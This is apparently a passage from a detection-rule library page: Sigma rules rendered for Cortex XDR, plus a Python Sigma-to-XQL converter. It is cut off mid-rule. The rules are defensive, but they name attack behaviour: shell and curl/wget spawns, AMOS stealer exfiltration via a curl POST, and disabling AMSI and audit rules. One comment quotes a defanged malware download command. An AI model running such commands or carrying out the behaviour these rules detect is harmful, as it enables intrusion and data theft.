Palo Alto Cortex XDR
763 rules · Sigma detections in Palo Alto Cortex XDR syntax
The same Sigma detection corpus, machine-rendered into Palo Alto Cortex XDR query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 1,524 rules (.zip, 675 KB)
Every Palo Alto Cortex XDR query in this view, packaged to deploy.
Filter by technique: pick techniques from the ATT&CK matrix
Reconnaissance (4) · Resource Development (5) · Initial Access (7) · Execution (25) · Persistence (31) · Privilege Escalation (17) · Stealth (63) · Defense Impairment (16) · Credential Access (26) · Discovery (24) · Lateral Movement (10) · Collection (11) · Command and Control (18) · Exfiltration (7) · Impact (10)
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape: status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet. The FP tier is derived from the rule's shape, not from a measured alert rate, so use it to decide what to tune first, not as a prediction of what your environment will produce.
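The Adapt and Deploy steps, worked through as an added example: a Python renderer that maps Sigma taxonomy fields onto xdr_data columns and emits an XQL query, here for the Apache Spark rule listed further down this page. This is not the site's renderer and not pySigma's Cortex XDR backend; the FIELD_MAP columns, the ENUM event types, the regex-based handling of endswith/contains and the assumption that XQL string literals use backslash escapes are all mine and must be checked against a known-good event in your tenant.

```python
"""Sigma rule -> Cortex XDR XQL, added to illustrate the Adapt and Deploy steps.
Not the site's renderer and not pySigma's Cortex XDR backend. FIELD_MAP, the
ENUM event types and the string-escaping rule are ASSUMPTIONS about the
xdr_data schema; verify each against a known-good event in your tenant."""

# ASSUMPTION: Sigma taxonomy field -> xdr_data column. In PROCESS_START
# events the started process is action_process_*, its parent actor_process_*.
FIELD_MAP = {
    ("linux", "process_creation"): {
        "__event__": "event_type = ENUM.PROCESS and event_sub_type = ENUM.PROCESS_START",
        "Image": "action_process_image_path",
        "ParentImage": "actor_process_image_path",
        "CommandLine": "action_process_image_command_line",
    },
    ("windows", "image_load"): {
        "__event__": "event_type = ENUM.LOAD_IMAGE",
        "Image": "actor_process_image_path",
        "ImageLoaded": "action_module_path",
    },
    ("windows", "file_event"): {
        "__event__": "event_type = ENUM.FILE and event_sub_type = ENUM.FILE_CREATE_NEW",
        "Image": "actor_process_image_path",
        "TargetFilename": "action_file_path",
    },
}

RE2_META = set("\\.^$|?*+()[]{}")

def literal_regex(value):
    """Escape a Sigma literal so the RE2 engine behind ~= matches it verbatim."""
    return "".join("\\" + c if c in RE2_META else c for c in value)

def xql_str(s):
    """Quote an XQL string literal (ASSUMPTION: backslash is the escape char)."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'

def field_predicate(column, modifiers, value):
    """One Sigma value plus modifiers -> one XQL predicate. Sigma matching is
    case-insensitive, hence lowercase(); endswith/startswith/contains become
    regexes padded with .* so they are right whether ~= is a full or partial match."""
    if "re" in modifiers:
        return f"{column} ~= {xql_str(value)}"
    lowered = str(value).lower()
    if "endswith" in modifiers:
        pattern = ".*" + literal_regex(lowered) + "$"
    elif "startswith" in modifiers:
        pattern = "^" + literal_regex(lowered) + ".*"
    elif "contains" in modifiers:
        pattern = ".*" + literal_regex(lowered) + ".*"
    else:
        return f"lowercase({column}) = {xql_str(lowered)}"
    return f"lowercase({column}) ~= {xql_str(pattern)}"

def selection_predicate(selection, fields):
    """Map-shaped selection: fields AND-ed; list values OR-ed, or AND-ed under |all."""
    parts = []
    for key, values in selection.items():
        name, *modifiers = key.split("|")
        column = fields[name]  # KeyError here = a field you still have to map
        values = values if isinstance(values, list) else [values]
        preds = [field_predicate(column, modifiers, v) for v in values]
        joiner = " and " if "all" in modifiers else " or "
        parts.append(preds[0] if len(preds) == 1 else "(" + joiner.join(preds) + ")")
    return " and ".join(parts)

def render(rule):
    """Handle the two condition shapes most rules on this page use:
    'selection' and 'selection and not filter'. Anything else is refused."""
    src = rule["logsource"]
    fields = FIELD_MAP[(src["product"], src["category"])]
    det = rule["detection"]
    condition = det["condition"].strip()
    if not isinstance(det["selection"], dict) or condition not in (
            "selection", "selection and not filter"):
        raise NotImplementedError(f"condition not handled here: {condition}")
    where = selection_predicate(det["selection"], fields)
    if condition == "selection and not filter":
        where += " and not (" + selection_predicate(det["filter"], fields) + ")"
    return f"dataset = xdr_data | filter {fields['__event__']} and {where}"

# Transcribed from the Apache Spark rule on this page (Linux parent path with '/').
SPARK_RULE = {
    "logsource": {"product": "linux", "category": "process_creation"},
    "detection": {
        "selection": {
            "ParentImage|endswith": "/bash",
            "CommandLine|contains": ["id -Gn `", "id -Gn '"],
        },
        "condition": "selection",
    },
}

if __name__ == "__main__":
    print(render(SPARK_RULE))
```

Paste the printed query into the XQL search and confirm it returns the Atomic test's event before saving it as a rule. A KeyError out of FIELD_MAP means the rule uses a field you have not mapped yet, which is the Adapt step making itself felt; the function refuses list-of-maps selections and `1 of` / `all of` conditions rather than emit something half right.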
Detection rules (50 shown of 763)
Level: high · Quality tier: Moderate · Alert volume: Medium FP
.RDP File Created By Uncommon Application
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
title: .RDP File Created By Uncommon Application
id: fccfb43e-09a7-4bd2-8b37-a5a7df33386d
related:
- id: f748c45a-f8d3-4e6f-b617-fe176f695b8f
type: derived
status: test
description: |
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
references:
- https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/
- https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-18
modified: 2024-11-01
tags:
- attack.stealth
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith: '.rdp'
Image|endswith:
# Covers browsers
- '\brave.exe'
- '\CCleaner Browser\Application\CCleanerBrowser.exe'
- '\chromium.exe'
- '\firefox.exe'
- '\Google\Chrome\Application\chrome.exe'
- '\iexplore.exe'
- '\microsoftedge.exe'
- '\msedge.exe'
- '\Opera.exe'
- '\Vivaldi.exe'
- '\Whale.exe'
# Covers email clients
- '\olk.exe' # Outlook
- '\Outlook.exe'
- '\RuntimeBroker.exe' # If the windows mail client is used
- '\Thunderbird.exe'
# Covers chat applications
- '\Discord.exe' # Should open the browser for download, but just in case.
- '\Keybase.exe'
- '\msteams.exe'
- '\Slack.exe'
- '\teams.exe'
condition: selection
falsepositives:
- Unknown
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
AMSI Disabled via Registry Modification
Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.
Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.
Adversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.
title: AMSI Disabled via Registry Modification
id: aa37cbb0-da36-42cb-a90f-fdf216fc7467
related:
- id: 7dbbcac2-57a0-45ac-b306-ff30a8bd2981 # Windows AMSI Related Registry Tampering Via CommandLine
type: similar
status: experimental
description: |
Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value.
Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications and services to integrate with anti-malware products for enhanced protection against malicious content.
Adversaries may attempt to disable AMSI to evade detection by security software, allowing them to execute malicious scripts or code without being scanned.
references:
- https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d
- https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal
- https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-12-25
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|endswith: '\Software\Microsoft\Windows Script\Settings\AmsiEnable'
Details: 'DWORD (0x00000000)'
condition: selection
falsepositives:
- Unlikely
level: high
regression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_amsi_disable/info.yml
simulation:
- type: atomic-red-team
name: AMSI Bypass - Create AMSIEnable Reg Key
technique: T1562.001
atomic_guid: 728eca7b-0444-4f6f-ac36-437e3d751dc0
Level: high · Quality tier: Strong · Alert volume: Medium FP
APT PRIVATELOG Image Load Pattern
Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
title: APT PRIVATELOG Image Load Pattern
id: 33a2d1dd-f3b0-40bd-8baf-7974468927cc
status: test
description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
references:
- https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
author: Florian Roth (Nextron Systems)
date: 2021-09-07
modified: 2022-10-09
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
- detection.emerging-threats
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\svchost.exe'
ImageLoaded|endswith: '\clfsw32.dll'
condition: selection
falsepositives:
- Rarely observed
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
Abusable DLL Potential Sideloading From Suspicious Location
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
title: Abusable DLL Potential Sideloading From Suspicious Location
id: 799a5f48-0ac1-4e0f-9152-71d137d48c2a
status: test
description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
references:
- https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html
- https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
author: X__Junior (Nextron Systems)
date: 2023-07-11
tags:
- attack.execution
- attack.t1059
logsource:
category: image_load
product: windows
detection:
selection_dll:
ImageLoaded|endswith:
# Note: Add more generic DLLs that cannot be pin-pointed to a single application
- '\coreclr.dll'
- '\facesdk.dll'
- '\HPCustPartUI.dll'
- '\libcef.dll'
- '\ZIPDLL.dll'
selection_folders_1:
ImageLoaded|contains:
- ':\Perflogs\'
- ':\Users\Public\'
- '\Temporary Internet'
- '\Windows\Temp\'
selection_folders_2:
- ImageLoaded|contains|all:
- ':\Users\'
- '\Favorites\'
- ImageLoaded|contains|all:
- ':\Users\'
- '\Favourites\'
- ImageLoaded|contains|all:
- ':\Users\'
- '\Contacts\'
- ImageLoaded|contains|all:
- ':\Users\'
- '\Pictures\'
condition: selection_dll and 1 of selection_folders_*
falsepositives:
- Unknown
level: high
Level: high · Quality tier: Moderate · Alert volume: High FP
Add Debugger Entry To Hangs Key For Persistence
Detects an attacker adding a new "Debugger" value under the "Hangs" key to achieve persistence; Windows Error Reporting invokes the configured debugger when it handles an application hang.
title: Add Debugger Entry To Hangs Key For Persistence
id: 833ef470-fa01-4631-a79b-6f291c9ac498
status: test
description: Detects an attacker adding a new "Debugger" value under the "Hangs" key to achieve persistence; Windows Error Reporting invokes the configured debugger when it handles an application hang.
references:
- https://persistence-info.github.io/Data/wer_debugger.html
- https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-21
modified: 2023-08-17
tags:
- attack.persistence
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Hangs\Debugger'
condition: selection
falsepositives:
- This value is not set by default but could rarely be used by administrators
level: high
Level: high · Quality tier: Moderate · Alert volume: High FP
Adwind RAT / JRAT
Detects javaw.exe in AppData folder as used by Adwind / JRAT
title: Adwind RAT / JRAT
id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
status: test
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
- https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
date: 2017-11-10
modified: 2022-10-09
tags:
- attack.execution
- attack.t1059.005
- attack.t1059.007
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|contains|all:
- '\AppData\Roaming\Oracle'
- '\java'
- '.exe '
- CommandLine|contains|all:
- 'cscript.exe'
- 'Retrive'
- '.vbs '
condition: selection
level: high
Level: high · Quality tier: Moderate · Alert volume: High FP
Adwind RAT / JRAT File Artifact
Detects javaw.exe in AppData folder as used by Adwind / JRAT
title: Adwind RAT / JRAT File Artifact
id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1
related:
- id: 1fac1481-2dbc-48b2-9096-753c49b4ec71
type: derived
status: test
description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
references:
- https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100
- https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf
author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
date: 2017-11-10
modified: 2022-12-02
tags:
- attack.execution
- attack.t1059.005
- attack.t1059.007
logsource:
category: file_event
product: windows
detection:
selection:
- TargetFilename|contains|all:
- '\AppData\Roaming\Oracle\bin\java'
- '.exe'
- TargetFilename|contains|all:
- '\Retrive'
- '.vbs'
condition: selection
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
Antivirus Filter Driver Disallowed On Dev Drive - Registry
Detects a registry change that stops antivirus minifilter drivers from attaching to a "Dev Drive" (FltmgrDevDriveAllowAntivirusFilter set to 0).
title: Antivirus Filter Driver Disallowed On Dev Drive - Registry
id: 31e124fb-5dc4-42a0-83b3-44a69c77b271
status: test
description: |
Detects a registry change that stops antivirus minifilter drivers from attaching to a "Dev Drive" (FltmgrDevDriveAllowAntivirusFilter set to 0).
references:
- https://twitter.com/0gtweet/status/1720419490519752955
author: '@kostastsale, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-11-05
modified: 2024-08-16
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|endswith: '\FilterManager\FltmgrDevDriveAllowAntivirusFilter'
Details: 'DWORD (0x00000000)'
condition: selection
falsepositives:
- Unlikely
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
Apache Spark Shell Command Injection - ProcessCreation
Detects attempts to exploit an Apache Spark server via CVE-2022-33891 (shell command injection) from a command-line perspective
title: Apache Spark Shell Command Injection - ProcessCreation
id: c8a5f584-cdc8-42cc-8cce-0398e4265de3
status: test
description: Detects attempts to exploit an Apache Spark server via CVE-2022-33891 (shell command injection) from a command-line perspective
references:
- https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py
- https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html
- https://github.com/apache/spark/pull/36315/files
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-20
tags:
- attack.initial-access
- attack.t1190
- cve.2022-33891
- detection.emerging-threats
logsource:
product: linux
category: process_creation
detection:
selection:
ParentImage|endswith: '/bash'
CommandLine|contains:
- 'id -Gn `'
- "id -Gn '"
condition: selection
falsepositives:
- Unlikely
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
Aruba Network Service Potential DLL Sideloading
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
title: Aruba Network Service Potential DLL Sideloading
id: 90ae0469-0cee-4509-b67f-e5efcef040f7
status: test
description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
references:
- https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-22
modified: 2023-03-15
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.t1574.001
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\arubanetsvc.exe'
ImageLoaded|endswith:
- '\wtsapi32.dll'
- '\msvcr100.dll'
- '\msvcp100.dll'
- '\dbghelp.dll'
- '\dbgcore.dll'
- '\wininet.dll'
- '\iphlpapi.dll'
- '\version.dll'
- '\cryptsp.dll'
- '\cryptbase.dll'
- '\wldp.dll'
- '\profapi.dll'
- '\sspicli.dll'
- '\winsta.dll'
- '\dpapi.dll'
filter:
ImageLoaded|startswith:
- 'C:\Windows\System32\'
- 'C:\Windows\SysWOW64\'
- 'C:\Windows\WinSxS\'
condition: selection and not filter
falsepositives:
- Unknown
level: high
Level: high · Quality tier: Moderate · Alert volume: High FP
Atlassian Confluence CVE-2022-26134
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
title: Atlassian Confluence CVE-2022-26134
id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66
related:
- id: 245f92e3-c4da-45f1-9070-bc552e06db11
type: derived
status: test
description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
references:
- https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-03
tags:
- attack.initial-access
- attack.execution
- attack.t1190
- attack.t1059
- cve.2022-26134
- detection.emerging-threats
logsource:
category: process_creation
product: linux
detection:
selection:
# Monitor suspicious child processes spawned by Confluence
ParentImage|startswith: '/opt/atlassian/confluence/'
ParentImage|endswith: '/java'
CommandLine|contains:
- '/bin/sh'
- 'bash'
- 'dash'
- 'ksh'
- 'zsh'
- 'csh'
- 'fish'
- 'curl'
- 'wget'
- 'python'
condition: selection
falsepositives:
- Unknown
level: high
Level: high · Quality tier: Moderate · Alert volume: High FP
Atomic MacOS Stealer - FileGrabber Activity
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
title: Atomic MacOS Stealer - FileGrabber Activity
id: e710a880-1f18-4417-b6a0-b5afdf7e33da
related:
- id: e710a880-1f18-4417-b6a0-b5afdf7e305a
type: obsolete
status: experimental
description: |
Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
references:
- https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
- https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing
- https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36
- https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
- attack.execution
- attack.t1059.002
- detection.emerging-threats
logsource:
category: process_creation
product: macos
detection:
selection_curl_post:
CommandLine|contains|all:
- 'curl'
- 'POST'
- 'user:'
- '-H '
- 'BuildID'
- 'file=@/tmp/out.zip'
- 'cl: 0'
selection_filegrabber_exec:
CommandLine|contains|all:
- 'FileGrabber'
- '/tmp'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
Atomic MacOS Stealer - Persistence Indicators
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
title: Atomic MacOS Stealer - Persistence Indicators
id: e710a880-1f18-4417-b6a0-b5afdf7e3023
status: experimental
description: |
Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
references:
- https://moonlock.com/amos-backdoor-persistent-access
- https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
- attack.persistence
- attack.privilege-escalation
- attack.stealth
- attack.t1564.001
- attack.t1543.004
- detection.emerging-threats
logsource:
category: file_event
product: macos
detection:
selection_user_helper:
# sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app
Image|endswith: '/curl'
TargetFilename|startswith: '/Users/'
TargetFilename|endswith: '.helper'
selection_launchdaemon:
TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
Level: high · Quality tier: Moderate · Alert volume: High FP
Attempts of Kerberos Coercion Via DNS SPN Spoofing
Detects the presence of the "UWhRC....AAYBAAAA" pattern in a command line.
The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
It is one of the strong indicators of a Kerberos coercion attack, in which adversaries manipulate DNS records
to spoof Service Principal Names (SPNs) and redirect authentication requests, as in CVE-2025-33073.
If you see this pattern in a command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
or a check for the presence of such records through the `nslookup` command.
title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
id: 0ed99dda-6a35-11ef-8c99-0242ac120002
related:
- id: b07e58cf-cacc-4135-8473-ccb2eba63dd2
type: similar
status: experimental
description: |
Detects the presence of the "UWhRC....AAYBAAAA" pattern in a command line.
The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
It is one of the strong indicators of a Kerberos coercion attack, in which adversaries manipulate DNS records
to spoof Service Principal Names (SPNs) and redirect authentication requests, as in CVE-2025-33073.
If you see this pattern in a command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
or a check for the presence of such records through the `nslookup` command.
references:
- https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-06-20
tags:
- attack.collection
- attack.credential-access
- attack.persistence
- attack.privilege-escalation
- attack.t1557.001
- attack.t1187
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'UWhRCA'
- 'BAAAA'
condition: selection
falsepositives:
- Unknown
level: high
Level: high · Quality tier: Moderate · Alert volume: High FP
Audit Policy Tampering Via NT Resource Kit Auditpol
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
title: Audit Policy Tampering Via NT Resource Kit Auditpol
id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e
related:
- id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version
type: similar
status: test
description: |
Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
references:
- https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-18
modified: 2023-02-21
tags:
- attack.defense-impairment
- attack.t1685.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '/logon:none'
- '/system:none'
- '/sam:none'
- '/privilege:none'
- '/object:none'
- '/process:none'
- '/policy:none'
condition: selection
falsepositives:
- The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
Audit Rules Deleted Via Auditctl
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
Removal of audit rules can significantly impair detection of malicious activities on the affected system.
title: Audit Rules Deleted Via Auditctl
id: bed26dea-4525-47f4-b24a-76e30e44ffb0
status: experimental
description: |
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
Removal of audit rules can significantly impair detection of malicious activities on the affected system.
references:
- https://www.atomicredteam.io/atomic-red-team/atomics/T1562.012
- https://linux.die.net/man/8/auditctl
author: Mohamed LAKRI
date: 2025-10-17
tags:
- attack.defense-impairment
- attack.t1685.004
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/auditctl'
CommandLine|re: '-D'
condition: selection
falsepositives:
- An administrator troubleshooting. Investigate all attempts.
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
Axios NPM Compromise File Creation Indicators - Linux
Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, each pulling in a malicious dependency, plain-crypto-js, whose postinstall script acted as a cross-platform RAT dropper.
title: Axios NPM Compromise File Creation Indicators - Linux
id: b7cb840c-11f6-47f7-b3ef-5524739c9077
status: experimental
description: |
Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, each pulling in a malicious dependency, plain-crypto-js, whose postinstall script acted as a cross-platform RAT dropper.
references:
- https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
- https://www.derp.ca/research/axios-npm-supply-chain-rat/
- https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
- https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
- https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
- attack.initial-access
- attack.t1195.002
- attack.command-and-control
- attack.t1105
- detection.emerging-threats
logsource:
category: file_event
product: linux
detection:
selection:
Image|endswith: '/curl'
TargetFilename: '/tmp/ld.py'
condition: selection
falsepositives:
- Highly unlikely
level: high
Level: high · Quality tier: Moderate · Alert volume: Medium FP
Axios NPM Compromise File Creation Indicators - MacOS
Detects file creation events linked to the Axios NPM supply chain compromise on macOS devices. Axios is a popular JavaScript HTTP client.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, each pulling in a malicious dependency, plain-crypto-js, whose postinstall script acted as a cross-platform RAT dropper.
title: Axios NPM Compromise File Creation Indicators - MacOS
id: 2db0458c-05c9-4069-a26f-77becd9c8c13
status: experimental
description: |
Detects file creation events linked to the Axios NPM supply chain compromise on macOS devices. Axios is a popular JavaScript HTTP client.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, each pulling in a malicious dependency, plain-crypto-js, whose postinstall script acted as a cross-platform RAT dropper.
references:
- https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
- https://www.derp.ca/research/axios-npm-supply-chain-rat/
- https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
- https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
- https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
- attack.initial-access
- attack.t1195.002
- attack.command-and-control
- attack.t1105
- detection.emerging-threats
logsource:
category: file_event
product: macos
detection:
selection_curl_download:
Image|endswith: '/curl'
TargetFilename: '/Library/Caches/com.apple.act.mond'
selection_node_shell:
Image|endswith: '/node'
TargetFilename: '/tmp/6202033'
condition: 1 of selection_*
falsepositives:
- Highly unlikely
level: high
Level: high · Quality tier: Moderate · Alert volume: High FP
Axios NPM Compromise File Creation Indicators - Windows
Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, each pulling in a malicious dependency, plain-crypto-js, whose postinstall script acted as a cross-platform RAT dropper.
The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
title: Axios NPM Compromise File Creation Indicators - Windows
id: cd6386fa-bb9a-4b67-b006-786b6ab5d2ba
status: experimental
description: |
Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
